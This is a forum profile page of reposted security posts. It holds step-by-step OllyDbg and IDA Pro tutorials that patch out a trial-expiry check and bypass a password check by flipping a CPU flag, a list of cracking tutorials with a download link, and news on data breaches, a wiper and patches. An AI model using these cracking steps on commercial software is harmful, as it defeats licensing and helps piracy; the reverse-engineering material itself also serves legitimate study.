Jump to content

Aerosol

Active Members
  • Posts

    3453
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by Aerosol

  1. Abstract The objective of writing this paper is to explain how to crack an executable without peeping at its source code by using the OllyDbg tool. Although, there are many tools that can achieve the same objective, the beauty behind OllyDbg is that it is simple to operate and freely available. We have already done much reverse engineering of .NET applications earlier. This time, we are confronted with an application whose origin is unknown altogether. In simple terms, we are saying that we don’t have the actual source code. We have only the executable version, which is a tedious task of reverse engineering. Essentials The security researcher must have a rigorous knowledge of assembly programming language. It is expected that the machine is configured with the following tools: OllyDbg Assembly programming knowledge CFF explorer Patching Native Binaries When the source code is not provided, it is still possible to patch the corresponding software binaries in order to remove various security restrictions imposed by the vendor, as well as fixing the inherent bugs in the source code. A familiar type of restriction built into software is copy protection, which is normally forced by the software vendor in order to test the robustness of the software copy protection. In copy protection, the user is typically obliged to register the product before use. The vendor stipulates a time restriction on the beta software in order to avoid license misuse and to permit the product to run only in a reduced-functionality mode until the user registers. Executable Software The following sample shows a way of bypassing or removing the copy protection in order to use the product without extending the trial duration or, in fact, without purchasing the full version. The copy protection mechanism often involves a process in which the software checks whether it should run and, if it should, which functionality should be allowed. One type of copy protection common in trial or beta software allows a program to run only until a certain date. In order to explain reverse engineering, we have downloaded the beta version of software from the Internet that is operative for 30 days. As you can see, the following trial software application is expired and not working further and it shows an error message when we try to execute it. We don’t know in which programming language or under which platform this software is developed, so the first task is to identify its origin. We can engage CFF explorer, which displays some significant information such as that this software is developed by using VC++ language, as shown below. We can easily conclude that this is a native executable and it is not executing under CLR. We can’t use ILDASM or Reflector in order to analyze its opcodes. This time, we have to choose some different approach to crack the native executable. Disassembling with OllyDbg When we attempt to load the SoftwareExpiration.exe file, it will refuse to run because the current date is past the date on which the authorized trial expired. How can we use this software despite the expiration of the trial period? The following section illustrates the steps in the context of removing the copy protection restriction: The Road Map Load the expired program in order to understand what is happening behind the scenes. Debug this program with OllyDbg. Trace the code backward to identify the code path. Modify the binary to force all code paths to succeed and to never hit the trial expiration code path again. Test the modifications. Such tasks can also be accomplished by a powerful tool, IDA Pro, but it is commercial and not available freely. OllyDbg is not as powerful as IDA Pro, but it is useful in some scenarios. First download OllyDbg from its official website and configure it properly on your machine. Its interface looks like this: Now open the SoftwareExpiration.exe program in OllyDbg IDE from File à open menu and it will decompile that binary file. Don’t be afraid of the bizarre assembly code, because all the modifications are performed in the native assembly code. Here the red box shows the entry point instructions of the program, referred to as 00401204. The CPU main thread window displays the software code in form of assembly instructions that are executed in top-to-bottom fashion. That is why, as we stated earlier, assembly programming knowledge is necessary when reverse engineering a native executable. Unfortunately, we don’t have the actual source code, so how can we inspect the assembly code? Here the error message “Sorry, this trial software has expired” might help us to solve this problem because, with the help of this error message, we can identify the actual code path that leads to it. While the error dialog box is still displayed, start debugging by pressing F9 or from Debug menu. Now you can find the time limit code. Next, press F12 in order to pause the code execution so that we can find the code that causes the error message to be displayed. Okay. Now view the call stack by pressing the Alt+ K. Here, you can easily figure out that the trial error text is a parameter of MessageBoxA as follows: Select the USER32.MessageBoxA near the bottom of the call stack, right click, and choose “Show call”: This shows the starting point in which the assembly call to MessageBoxA is selected. Notice that the greater symbol (>) next to some of the lines of code, which indicates that another line of code jumps to that location. Directly before the call to MessageBoxA (in red color right-pane), four parameters are pushed onto the stack. Here the PUSH 10 instruction contains the > sign, which is referenced by another line of code. Select the PUSH 10 instruction located at 004011C0 address, the line of code that references the selected line is displayed in the text area below the top pane in the CPU windows as follows: Select the text area code in the above figure and right click to open the shortcut menu. It allows you to easily navigate to the code that refers to a selected line of code as shown: We have now identified the actual line of code that is responsible for producing the error message. Now it is time to do some modification to the binary code. The context menu in the previous figure shows that both 00401055 and 00401063 contains JA (jump above) to the PUSH 10 used for message box. First select the Go to JA 00401055 from the context menu. You should now be on the code at location 0×00401055. Your ultimate objective is to prevent the program from hitting the error code path. This can be accomplished by changing the JA instruction to NOP (no operation), which actually does nothing. Right click the 0×00401055 instruction inside the CPU window and select “Binary” and click over Fill with NOPs as shown below: This operation fills all the corresponding instruction for 0×00401055 with NOPs: Go back to PUSH 10 by pressing hyphen (~) and repeat the previous process for the instruction 0×00401063, as follows: Now save the modifications by right-clicking in the CPU window, clicking Copy to Executable, and then clicking All Modifications. Then hit the Copy all button in the next dialog box, as shown below: Right after hitting the “Copy all” button, a new window will appear named “SoftwareExpiration.exe.” Right-click in this window and choose Save File: Finally, save the modified or patched binary with a new name. Now load the modified program; you can see that no expiration error message is shown. We successfully defeated the expiration trial period restriction. Final Note This article demonstrates one way to challenge the strength of the copy protection measure using OllyDbg and to identify ways to make your software more secure against unauthorized consumption. By attempting to defeat the copy protection of your application, we can learn a great deal about how robust the protection mechanism is. By doing this testing before the product becomes publically available, we can modify the code to make circumvention of copy protection more difficult before its release. Source
      • 2
      • Upvote
  2. This editorial is committed to subverting the essential security restriction mechanisms of a native binary executable by employing the IDA Pro Dissembler. This paper is basically elaborating a very complex mechanism of reverse engineering among the previously demonstrated papers, yet because it is a very exhaustive and long process, it claims epic proportions of patience and proficiencies in Machine code instructions — but it is very interesting and challenging. We have mostly focused on .NET reverse engineering so far, which is relatively an easy task, instead of native binary reversing, because the source code is straightforwardly manipulated by dissemblers. This article would surely assist the aspirants who are repeatedly seeking a step by step tutorial on IDA Pro reverse engineering, because no such paper is perfectly crafted in laborious fashion so far. This article showcases the particulars of these contents: Live Binary Sample Target Target Analysis with IDA Pro Cracking the Target Alternative way of Tracing Final Note There are ‘n’ numbers of approaches for reverse engineering, and picking the appropriate one depends on the target program, the platform on which it runs and on which it was developed, and what kind of information you’re seeking to extract. Generally speaking, there is one fundamental reversing methodology: offline analysis, which is all about taking a binary executable and using a disassembler to convert the machine code into a human-readable form. Reversing is then performed by manually reading and analyzing parts of that output. Offline code analysis is a powerful approach because it provides a good outline of the program and makes it easy to search for specific functions that are of interest. The disassembler is one of the most significant reverse engineering apparatuses. Essentially, a disassembler decodes binary machine code into a readable assembly language code. The disassembler merely decodes each instruction and creates a textual representation for the code. It is trivial to say, the specific instruction encoding format and the resulting textual representation are entirely platform-specific. Each platform provides a different set of instructions and registers. Therefore a disassembler is also platform-specific (even though there are a couple of disassemblers that contain specific support for multiple platforms). Essential The target file IDA Pro Interactive Dissembler PE signature verifier Assembly Language skills Live Binary Sample Target This time, I have chosen a target binary which is being applied over reverse engineering, and its origin is in fact totally unknown to us. This executable basically first validates the user identity by asking the password. If user enters the correct information, then he would be able to proceed; otherwise it echoes the wrong password message over the screen. But we have obtained this binary from some unauthentic sources. Thus we are not provided with the user password token key which would probably have part of a license key. Luckily, we have only the executable, not the source code, so that we can figure out the mechanism implemented behind the scenes. Figure 1.1 So the only possibility left to carry on without buying the license code is to reverse engineer this binary file using IDA Pro dissembler. It is indispensable to confirm either this target binary is a standard Windows PE file or belongs to some other platforms, because it is mandatory for a binary file to have the PE file signature; otherwise, IDA Pro won’t dissemble it. So to achieve this, we can assist PE Explorer to obtain the signature information of this binary as follows in the file Header section. Figure 1.2 The aforesaid figure clearly expresses that this binary has a Windows PE signature and hence could be dissembled by IDA Pro, which we are going to elaborate in the next section. Target Analysis with IDA Pro Well, we have obtained the origin information of the target file so far using PE explorer. As we have stated earlier, reversing with IDA Pro is truly a laborious task, because we have to encounter trivial machine code. We don’t have the source code, rather only the binary executable. However, we first decompile or dissemble the binary using IDA Pro in order to comprehend what mechanics are implemented implicitly. Thus, launch the IDA Pro software, and it will ask to choose the prototype of a new disassemble file: Figure 1.3 After configuring the disassemble prototype as a new project, the IDA prompts to open the target binary as in the following figure. Figure 1.4 Right after choosing the target file, IDA Pro displays a screen dialog which stated three type of a file to be reversing as PE File, DoS Executable File, and Binary file. These file types basically point out the platform on which they were developed. In our scenario, the PE file is best fit-in because we have chosen a Windows 32 console application as per the figure 1.2; Apart from that, we can organize other option such as processor type, kernel and DLL renaming as follows: Figure 1.5 Finally, click OK. Don’t bother ahead because IDA Pro prompts a couple of alert messages, open in two different dialog windows. On the whole, much internal processing is done before opening a target file. As you can grasp the RED BOX in the following figure 1.6, we have a function window which enumerates all the methods and routines used in this executable. The graph window creates the control execution in flow chart format stated in the RED BOX. It provides a drag-able and moveable dashed rectangle box which can let us reach anywhere in the code execution. In the BLUE BOX, it shows the decompile code in assembly code format and most importantly, we can access any segment of code such as entry point, containing text string, binary pattern and marked position just by dragging the pointer in the first RED BOX. Figure 1.6 The important point to note here is that the Debugger menu would only be visible if the target file has the correct PE signature; otherwise it remains invisible. That’s why is better to identify first the signature of the target file using PE explore. We shall accomplish the task of logic tracing by debugging the decompiled file. We however choose the appropriate debugger. In our case, we pick Local Win32 debugger as follows: Figure 1.7 After ensuring the mandatory configuration, it is time to correlate with the actual mechanism by using the arrow mentioned in the following figure 1.8; it basically requires some hit and trail to find out the actual execution code path by dragging the pointer. The alert string message mentioned in figure 1.1 assist us to figure out the execution path. In fact, this target file shows numerous execution paths, and some of them are useful in the context of reversing, and the remaining ones are useless. So, the code flow that shows the alert message “Enter the password” is very significant to the reversing point of view, because this is the key value or entry point by which we can trace the essential code. Figure 1.8 After moving the pointer to a specific location, we can find the actual mechanism logic flow as following. It typically shows the control flow when we enter the wrong password value. Figure 1.9 The logic path flow mentioned in the aforesaid figure usually does not fit in the work area window. For this purpose, we can move the dashed rectangle in the graph overview by dragging it to reach a specific segment as follows: Figure 1.10 After moving the pointer to the appropriate location, we have found the decompiled code in assembly language format. Here, we can easily assume that this program prompts the user to enter the password by the scanf method mentioned in the RED BOX. Then this value is compared to a predefined string value (which is password) using the strcmp method. The test eax register is holding the value 0 or 1 which would come based on the string comparison. Finally, the jnz instructs the compiler to directly jump to the false segment branching, which is location 411444. Figure 1.11 If the eax register contains the value 0, then the condition would be true and the code execution directed to the box highlighted by cyan color. If it has a value of 1, then the control flow diverts toward the false condition block as follows: Figure 1.12 If the user enters the correct password, the following assembly code segment would be executed, in which first the “congratulations” message would be displayed along with the actual password information as follows: Figure 1.13 As we have stated earlier, the code flow instructions are huge in quantity, so we have to move the dashed rectangle from time to time in order to reach the specific code block. This time we move to a false condition block as follows: Figure 1.14 If the eax register doesn’t contain the value 0, then the execution is diverted toward the following figure block where the “Wrong Password! Try again” message will be print on the screen as shown below. Figure 1.15 Finally, no matter what value the eax register holds, the compiler always executes the following assembly instruction, where the getch method is encountered every time as follows: Figure 1.16 So, we have successfully disassembled the target assembly code to correlate to the actual mechanism running behind the scenes. We have come to a conclusion that the eax register value is the key hack. If its value is 0, then we entered into the true condition code block; otherwise we entered into the false condition block. Cracking (Reversing) the Target So, the eax register value would be the key interest for the reverser to subvert the password mechanism. If we change that value manually during debugging, then we can reach the true condition block even if we enter the wrong password information. In this encounter, our leading objective is to collapse the jump statement (jnz) execution so that the calling of method loc_411444 won’t happen. To do so, run this application in debugging mode. However, place a breackpoint at eax instruction by using F2. The instruction would be submerged in red box as follows: Figure 1.17 Then, run this executable by Start Process (F9) from Debugger. Again, a couple of windows appeared, then disappeared as usual. Figure 1.18 After that, the target starts to execute in DoS mode, because it is a console application. Here, it asks the user to enter the password as per its functionality, but unfortunately we don’t have the password. So, just enter any value as a password and press enter. Figure 1.19 The moment we press enter after entering the bogus password value as test, the execution is transferred to the IDA View-A, and we reach the instruction where we placed the breakpoint earlier. Then we have to move ahead manually by pressing the step into (F7) and we step forward to the jump instruction. Here, we notice that the green arrow (in the RED BOX) started blinking, which points out that the execution is about to transfer to the B31444 method block. If we didn’t do anything, the wrong password message display as usual. Figure 1.20 The execution is transferred to B31444 (false condition) block because eax register has a value as 1. The transmission to the false condition block happens due to the ZF value as 0. If this value would have 1, then the true condition block would execute. Figure 1.21 However, if we modify the value of ZF to 1, then we could control the code path execution to a true condition block. In order to change this value, right click over value and select Modify value as: Figure 1.22 Here, just replace the ZF register value from 1 to 0 and click OK. Figure 1.23 The moment the ZF register value is changed to 1, we notice that the execution flow is instantly changed to the true condition block by repeatedly blinking the red arrow in the BOX as follows: Figure 1.24 Now, go to the Debugger menu and press the Run until return option, which ends the execution after reaching the end of the code. Bingo!!! The target binary is showing the congratulation message even if entering the wrong password value. In addition to that, this program shows the original password value as ajay. Figure 1.25 So, we successfully subvert the password security mechanism just by diverting the binary code flow execution. But to get rid of a common misconception, we have to reverse engineer this target file, which is actually not patched. The password restriction is still in place, because we have not modified the corresponding bytes so far. Alternate way of Tracing Identification of the program entry point is always complex in IDA Pro because it shows raw assembly code. We have applied such a process by moving the arrow as in Figure 1.8. But this is a very cumbersome task. There is another way which eases the task of identifying such entry points. A program displays some string to carry on the execution ahead or to assist the user to control the execution. Just consider the following figure: It asks the user to enter the password by prompting the “Please enter the password” string. Figure 1.26 This string could be beneficial in terms of finding the entry points. So go to Text search and enter this string in the box, which finds such entries in the assembly code as follows: Figure 1.27 Alternatively, the string window displays all the in-built strings value of the target program. Just double click over the “Please enter the password” string, which redirects us to its assembly code. Figure 1.28 Here, we didn’t find the code execution in flow chart format, but in actual assembly code. So we reached the location where the string is located. Place the breakpoint here by F2 as earlier. Therefore, follow the operation or steps as performed earlier from Figure 1.18: Figure 1.29 Final Note This rare piece of information illustrated the process of disassembling as well as reverse engineering tactics over a native binary by using IDA Pro disassembler. We have seen the importance of the register values of binary code to correlate with actual program implementation and what role they can play in the reversing process. We have subverted the password mechanism just by modifying the value of the ZF register, which is connected to the eax register. The tutorial that applies to the binary target is dedicated to reversing the logic flows only, not patching the byte code associated with mechanism. There is no permanent change in memory related bytes; if we run this target again without IDA Pro, the password mechanism is still there, and it is not bypassed yet. We will discuss byte patching in detail in the next article. Source
  3. Tutorial #1 - What is reverse engineering? Tutorial #2 - Introducing OllyDBG Tutorial #3 - Using OllyDBG, Part 1 Tutorial #4 - Using OllyDBG, Part 2 Tutorial #5 - Our First (Sort Of) Crack Tutorial #6 - Our First (True) Crack Tutorial #7 - More Crackmes Tutorial #8 - Frame Of Reference Tutorial #9 - No Strings Attached Tutorial #10 - The Levels of Patching Tutorial #11 - Breaking In Our Noob Skills Tutorial #12 - A Tougher NOOBy Example Tutorial #13 - Cracking a Real Program Tutorial #14 - How to remove nag screens Tutorial #15 - Using the Call Stack. Tutorial #16A - Dealing with Windows Messages. Tutorial #16B - Self Modifying Code. Tutorial #16C - Bruteforcing. Tutorial #17 - Working with Delphi Binaries. Tutorial #18 - Time Trials and Hardware Breakpoints. Tutorial #19 - Creating patchers. Tutorial #20A - Dealing with Visual Basic Binaries, Part 1. Tutorial #20B - Dealing with Visual Basic Binaries, Part 2. Tutorial #21 - Anti-Debugging Techniques. Tutorial #22 - Code Caves and PE Sections. Tutorial #23 - TLS Callbacks. Modifying Binaries For Fun And Profit Adding a Splash Screen - Creating a code cave to show a custom splash on an application Adding a Menu Item - Adding a menu item to an existing binary. Making a Window Non-Closeable - Making a Window Non-Closeable. The Never Ending Program - Opening message boxes every time a user tries to close a program. DLL Injection 1 - Adding an opening message box through DLL injection. DLL Injection 2 - Adding a splash bitmap through DLL injection. R4ndom’s Guide to RadASM Installing and setting up - Installing RadASM and configuring the environment. Creating our first project - Creating our first project. Adding an Icon and Menu - Adding an Icon and Menu. Miscellaneous The Reverse Engineer’s Toolkit - Tools every reverse engineer should know about. Shrinking C++ Binaries - Shrinking binaries through Visual Studio. Other Tutorials Author Tutorial XOR06 Cracking DriverFinder nwokiller Unpacking PELock v1.06 XOR06 Bypassing a keyfile XOR06 Bypassing a Serial and server Check XOR06 Bypassing a Serial in a Delphi Binary XOR06 Finding a serial using bitmaps. XOR06 Easy unpacking. XOR06 Where and How to pacth a serial routine. XOR06 Patching a server check, 30 day time trial, and a nag. XOR06 Serialfishing a correct serial. XOR06 Another way of finding the patch. XOR06 Why it’s so important to search for pointers. XOR06 .NET Crackme with tutorial XOR06 .NET Crackme (no tutorial) Filesize 171.69 MB Link: https://tuts4you.com/request.php?3554
  4. ================================================== ================ CrowdRE – Crowdsourced Reverse Engineering: The CrowdRE project aims to fill this gap. Rather than using a live distribution of changes to all clients, which has proven to fail in the past, it leverages from the architecture that is being used with success to organize source code repositories: a system that manages a history of changesets as commit messages.The CrowdRE client is now freely available as an IDA Pro plugin. CrowdStrike maintains a central cloud for the community to share their commits amongst each other. This basic concept is sufficient for a collaborative workflow on a per-function basis for a shared binary. One exciting feature is a similarity hashing scheme that considers the basic block boundaries of a function. Each function is mapped on a similarity preserving hash of fixed size. https://crowdre.crowdstrike.com/sign-in Tutorial: OLLYDBG TOOL: Version 2.01 alpha 2 This tool is mostly used for REVERSE ENGINEERING. We can make a own license key with the help of it, Any trial version will be a crack from this tool OLLYDBG. The most important novelty is that this version is compatible with Windows 7. I have tested it under Win7 Home Premium 32-bit. http://www.ollydbg.de/odbg201b.zip Tutorial: HEX WORKSHOP TOOL: The Hex Workshop Hex Editor is a set of hexadecimal development tools for Microsoft Windows, combining advanced binary editing with the ease and flexibility of a word processor. With Hex Workshop you can edit, cut, copy, paste, insert, and delete hex, print customizable hex dumps, and export to RTF or HTML for publishing. Additionally you can goto, find, replace, compare, calculate checksums, add smart bookmarks, color map, and generate character distributions within a sector or file. Hex Workshop supports drag and drop and is integrated with the Windows operating system so you can quickly and easily hex edit from your most frequently used workspaces. The Data Inspector is perfect for interpreting, viewing, and editing decimal and binary values. Arithmetic, logical, ascii case, and bitwise operations can be used to help manipulation your data in place. An Intergrated Structure Viewer allows you to view and edit data in the most intuitive and convenient way.The structure viewer supports nested structures, references to other structures, along with many atomic data types: char, byte, ubyte, word, uword, long, ulong, longlong, float, double, OLE Date/Time, DOSTIME, DOSDATE, FILETIME, and time_t. Link: Hex Workshop: Hex Editor, Sector Editor, Base Converter and Hex Calculator for Windows Source
  5. Frate tu ai idee cat de mult inseamna un path disclosure in site-ul lui vic? poti sa gasesti acolo pornachele indian ascuns! ) @cotnariUK esti tare baaa....
  6. A Minnesota District Court ruling this week related to the 2013 Target data breach has opened the door for banks to pursue damages from retailers victimized by a data breach. Judge Paul A. Magnuson ruled that Target was negligent in ignoring and, in some cases, turning off security features that the court said would have stopped the 2013 holiday shopping season breach. In a 16-page explanation, Magnuson concluded that financial institutions pursuing compensation from Target in court can continue with class-action lawsuits. “This opens the door to a legal precedent that if you get breached, you’re now automatically responsible for all the bank costs they can think of,” said Gartner vice president and distinguished analyst Avivah Litan. “Now what governs rules of liability are Visa and Master Card rules, and those are not law, they’re rules of the card brands. Now, those rules are becoming law.” The bone of contention in the Minnesota ruling is that Target ignored alerts set off by a FireEye malware detection system installed months prior to the breach. Target’s contention is that the system fired off thousands of alarms, and that it was impossible to distinguish between less important alerts, false positives and the more serious indications that an intrusion had occurred. The Target hackers were able to access the giant retailer’s network by using the compromised credentials of a HVAC vendor contracted by Target. The hackers were able to use those credentials to burrow deep into the retailer’s network, install point-of-sale malware on terminals in many of its locations in the U.S., and then siphon off 40 million payment card numbers and security codes, and the personal information of 70 million customers. The data was stored on servers inside the Target network until it was exfiltrated by the hackers, investigators have revealed. “Although the third-party hackers’ activities caused harm, Target played a key role in allowing the harm to occur,” Magnuson wrote in his ruling. “Indeed, Plaintiffs’ allegation that Target purposely disabled one of the security features that would have prevented the harm is itself sufficient to plead a direct negligence case.” Litan questioned the ruling from the sense that Target’s difficulties in properly analyzing alerts from its detection systems are not unique. “It’s not fair at all. I’m sure the alarms went off at Chase as well,” Litan said, referring to a massive breach at JP Morgan Chase this summer. “These systems put out hundreds of thousands of alerts a day and it’s difficult to know which are important. It’s wrong to pull out the FireEye alerts and say Target didn’t listen to them. This demonstrates the difficulty in keeping up with security monitoring. Target is not alone; they’re not the only institution that can’t keep up with 100,000 alerts an hour. Look what happened with JP Morgan Chase, and they’ve got a $250 million budget allocated to cyber.” Data breaches have been a fairly regular occurrence for close to a decade. The response of banks in the early hey-day of ChoicePoint, CardSystems, Heartland and other massive breaches was to roll out the Payment Card Industry Data Security Standard (PCI-DSS) and shift responsibility for securing payment systems onto the retailers. Next October, chip-and-PIN rollouts are expected to accelerate in the U.S. as a shift in liability happens where the party with the lesser standard of care becomes responsible in the event of a breach. For example, if mag stripe data is stolen from a retailer that supports chip-and-PIN cards, for example, the card-issuing bank assumes liability. Retailers, meanwhile, have argued that they too have borne tremendous costs because of breaches. In a letter from a number of prominent retail associations, including the National Retail Federation and the Retail Industry Leaders Association, to the Credit Union National Association and National Association of Federal Credit Unions, retailers argue that costs are borne equally with financial institutions and that retailers do contribute to the costs of issuing new cards to consumers post-breach. Retailers also pointed out in the letter dated Oct. 30 that merchants collectively spend $6 billion annually on data security and are proactively leading the charge for chip-and-PIN deployments. They back up their case, demonstrating that outside the U.S., 70 percent of merchants support chip-and-PIN point-of-sale terminals (40 percent of consumers carry upgraded chip cards), whereas in the U.S., 20 percent of merchants have upgraded terminals, but fewer than one percent of cards have chips rather than mag stripes. “The most unfair part of this is that the banks saw this coming in 2006 and their response was PCI and to put security problems on the retailers,” Litan said. “And only now are they moving to chip-and-PIN. Target would not have happened. Home Depot would not have happened if they’d acted quickly then. You cannot rely on millions of retailers to secure insecure payment systems.” Source
  7. Adobe is expected to update its Reader and Acrobat software next Tuesday as part of its scheduled security updates, and the updates will, according to an Adobe spokesperson, include patches for a Reader vulnerability disclosed this week by Google’s Project Zero. Researcher James Forshaw, a well-known bug-hunter and Project Zero member, went public with details of a sandbox escape vulnerability in Reader as well as exploit code. Per its policy, Google’s security research team discloses vulnerability details 90 days after it shares those details with the vendor in question. In this case, the vulnerability was partially addressed earlier by Adobe after it was reported in August. Adobe tweaked Reader in order to make exploiting the vulnerability much more difficult. The flaw, however, had not been patched. In a pre-notification advisory published yesterday afternoon, Adobe said it will release a security update for Adobe Reader 11.0.09 and earlier, and 10.1.12 and earlier, as well as Acrobat 11.0.09 and earlier, and Acrobat 10.1.12 and earlier. Forshaw said the vulnerability is a race condition in the handling of the MoveFileEx call hook in Adobe Reader. “This race can be won by the sandboxed process by using an OPLOCK to wait for the point where the MoveFileEx function opens the original file for the move. This allows code in the sandbox to write an arbitrary file to the file system,” Forshaw wrote in the Project Zero bug report. Adobe’s adjustment to Reader in version 11.0.9 prevented the vulnerability from using the broker file system hooks to create directory junctions, Forshaw said. Forshaw’s disclosure came a week after Adobe released an emergency security update for Flash Player. The Nov. 25 update patched a code-execution vulnerability in Flash that was already being exploited in the Angler and Nuclear exploit kits, French researcher Kafeine discovered. Adobe thought it had patched the issue in question with its October security updates that addressed three memory-corruption vulnerabilities. The emergency patch resolved a fourth, CVE-2014-8439. “These updates provide additional hardening against a vulnerability in the handling of a dereferenced memory pointer that could lead to code execution,” Adobe said in its advisory. Source
  8. Researchers are starting to stitch together clues about the wiper malware that has landed a body blow to Sony Pictures Entertainment. Not only were thousands of files and documents leaked that included unreleased movies, confidential company presentations and financial records, employee records, passwords and more, but an untold number of machines were left unusable by malicious code identified as Destover. Destructive attacks aren’t new, and they’re happening with frequency at different scales. Smaller companies and individuals are falling victim to new strains of ransomware at alarming rates. CryptoLocker, for example, encrypts files on a compromised machine, promising a decryption key if a ransom is paid. Destover, and the like, are much more dangerous in that they overwrite the master boot record on a computer, not only rendering the computer useless after robbing it blind, but also leaving few bread crumbs for investigators to follow. Kaspersky Lab researcher Kurt Baumgartner today published a report exposing Destover’s functionality and describing similarities between this malware and similar code used in the Shamoon attack against Saudi Aramco and the DarkSeoul attack last year in South Korea. Across the three attacks, Baumgartner notes the use of commercially available Eldos RawDisk driver files (Shamoon and Destover), that wiper drivers are maintained in the dropper’s resource section (Shamoon, Destover), and disk data and the MBR are overwritten with encoded political messages (Shamoon, DarkSeoul). Destover, Baumgartner said, was compiled anytime in the 48 hours prior to the attack, similarly to the DarkSeoul attacks, and that the attackers already had a longstanding foothold on the network. Shamoon was also compiled in the days leading up to the Aramco attack, a tight timeline given the number of workstations (30,000-plus) that were damaged. “In all three cases: Shamoon, DarkSeoul and Destover, the groups claiming credit for their destructive impact across entire large networks had no history or real identity of their own,” Baumgartner wrote. “All attempted to disappear following their act, did not make clear statements but did make bizarre and roundabout accusations of criminal conduct, and instigated their destructive acts immediately after a politically-charged event that was suggested as having been at the heart of the matter.” In the case of Destover, the popular narrative has been to blame North Korea for the attack on Sony in retaliation for the upcoming release of “The Interview” in which the plot revolves around a fictional attempt by the CIA to assassinate North Korea’s leader Kim Jong Un. When details regarding “The Interview” were announced in June, a spokesman for the North Korean Foreign Ministry condemned the film, calling it a “blatant act of terrorism and war.” In his report, Baumgartner explains other similarities between the three attacks, including their use of the EldoS RawDisk drivers to overwrite disk data and the MBR, backdoors used in the attack, and the potential for data recovery. “The above list of commonalities does not, of course, prove that the crew behind Shamoon is the same as the crew behind both DarkSeoul and Destover. But it should be noted that the reactionary events and the groups’ operational and toolset characteristics all carry marked similarities,” Baumgartner wrote. “And, it is extraordinary that such unusual and focused acts of large scale cyber-destruction are being carried out with clearly recognizable similarities.” The Sony saga picked up steam this week not only as the leaks intensified, but also after the FBI on Sunday issued a confidential flash alert to enterprises in the United States warning them of wiper malware attacks. The FBI did not name any victims such as Sony in the flash alert, but Ars Technica today reported it had seen the memo and shared some of its contents, including a Snort rule for the signal sent to the malware’s command and control infrastructure, and a YARA rule to be used for detection. News on the Sony attack broke before Thanksgiving last week when it was reported that most internal systems were down and unusable. Screens on internal workstations popped up claiming that Sony had been “Hacked By #GOP,” a hacker group named Guardians of Peace. The notice, alongside a red skull, went on to warn the company that it had “obtained all your internal data including your secrets and top secrets” and that it would release it unless the company obeyed the group. Source
  9. WASHINGTON D.C. — It’s 2020, bitter cold outside, you’re running late for work, and the Linux box that controls your car isn’t going to start unless you wire $20 worth of Bitcoin to an increasingly business-like criminal enterprise operating out of Eastern Europe. Of course it’s not 2020. And to date there’s been no public instance of ransomware – let alone regular malware – targeting the onboard operating system of an automobile. However, in a panel discussion at Georgetown Law’s “Cybercrime 2020: The Future of Online Crime and Investigations” conference this morning, Dino Dai Zovi, “Hacker in Residence” at the New York University Polytechnic School of Engineering, reasoned that if the price were low enough, nearly anyone would pay to unlock their car. To this, Michael Stawasz, the panel’s moderator and the deputy chief of the Computer Crime & Intellectual Property Section (CCIPS) at Department of Justice, wondered aloud if there would come a point where his refrigerator was pinching him for $.25 every time he tried to make a sandwich. Indeed the panel agreed that ransomware is likely the future of cybercrime, at least as far as consumers are concerned. “I think we are going to see ransomware scale well in the Internet of things,” Dai Zovi said. “It’s already targeting networked storage.” Martin Libicki, senior management scientist at RAND Corporation explained that so much of the cybercrime world is presently focused on converting information into money. When a payment processor at a retail location is compromised, in order to actually make money, the criminals then not only have to transfer that information away from the retailer but they also have to find a way of actually withdrawing money from those corresponding bank accounts or credit lines. Under the current system in the U.S., criminals are getting more efficient at translating data into money. However, the panel agreed, this will become more difficult as banking security becomes more sophisticated and as more secure payment forms like EMV become the norm. Contrast that with a simple, two-step ransomware scheme, which encrypts or locks a machine and demands direct payment to decrypt it or unlock it, and crypto and locker malware starts to seem immortal. As a caveat, Libicki forecasted that someone somewhere would certainly come up with a new way of monetizing information that no one in the panel, audience or world could possibly predict today. This, he said, is why it’s so hard to say what cybercrime will look like in the year 2020. Libicki later reasoned that it’s a wonder that so little ransomware attacks take place today. Moving away from consumer threats, he noted that the Iranians and the North Koreans seem to enjoy bricking computers. Bricking and ransomware are by no means the same, in that the former simply destroys machines while the latter renders one useless unless the user is willing to pay a fee. However the two attacks are similar in principle, in that they offer criminals the leverage of denying their victims’ access to the machines on which they rely – either permanently or temporarily. Rick Howard, the CSO of security firm Palo Alto Networks followed Libicky’s train of thought. He predicted that ransomware is also likely to become a favorite tool among hacktivist groups, merely seeking to disrupt operations or gain leverage in order to affect change. Howard further hammered the efficacy of ransomware, saying that the cybercrime business model is deeply concerned with customer service. Contrary to what many experts say and recommend, Howard said that ransomware perpetrators are very good at restoring service for any victims that decide to pay the ransom. “Ransomware is the future; it’s is going to touch the consumer hard,” Howard said. “Banks cover credit card fraud. Just wait until [criminals] start poking you for $20 per month.” In reality, ransomware has already impacted the consumer in a deep way — some six years before the future-date envisioned by the panelists. The CrytpoLocker malware garnered heavy media attention earlier this year, and the opening remarks from the panel’s final member, Andrew Bonilla, the director of cybersecurity and public safety at Verizon Business, could suggest exactly why CryptoLocker was so exigent. “Every high-level instance of cybercrime has a street-level component at some point,” Bonilla explained. “When you start to put a face to cybercrime it starts to make a difference. We need to be able to see who and what is affected and who is responsible for it.” Source
  10. Microsoft made patch news on two fronts last month with an unusual emergency patch for a critical vulnerability in Kerberos, and for a missing fix for an Exchange bug that was promised in its November advanced notification. In the December advance notification, released today, an elevation privilege bug in Exchange is listed among seven scheduled bulletins to be pushed out next Tuesday. The Exchange patch is rated important, one of four bulletins so rated by Microsoft; the remaining three are rated critical, meaning the likelihood of remote code execution and imminent exploit is high. Expect the Exchange patch to be MS14-075. The patch applies to Microsoft Exchange Server 2007 SP3, Exchange Server 2010 SP3, Exchange Server 2013 SP1 and Exchange Server 2013 Cumulative Update 6. No further details were made available by Microsoft. The three critical bulletins expected next week are topped off by another Internet Explorer rollup. The IE vulnerabilities addressed are rated moderate for IE 6, IE 7 and IE 8 running on Windows Server 2003 and Windows Server 2008. They are rated critical for remote code execution on Vista, Windows 7, Windows 8 and 8.1 for IE 7 and up. Another critical remote code execution bulletin is expected in Office software starting with Microsoft Word 2007 SP 3, as well as Microsoft Office 2010 SP 2, Word 2010 SP 2, Word 2013 and Word 2013 RT. Microsoft Office for Mac 2011 is also vulnerable, as is Microsoft Word Viewer and Microsoft Office Compatibility Pack. Microsoft SharePoint Server 2010, 2013, and Microsoft Office Web apps 2010 and 2013 are also covered by this bulletin, but those vulnerabilities are rated important. Two other bulletins patch remote code execution vulnerabilities in Office, but are rated important, meaning there is some mitigating circumstance, for example, an attacker would need local access or legitimate credentials exploit the flaw. “With the balance of next week’s bulletins impacting Windows, December will be a month for IT to focus on the desktop,” said 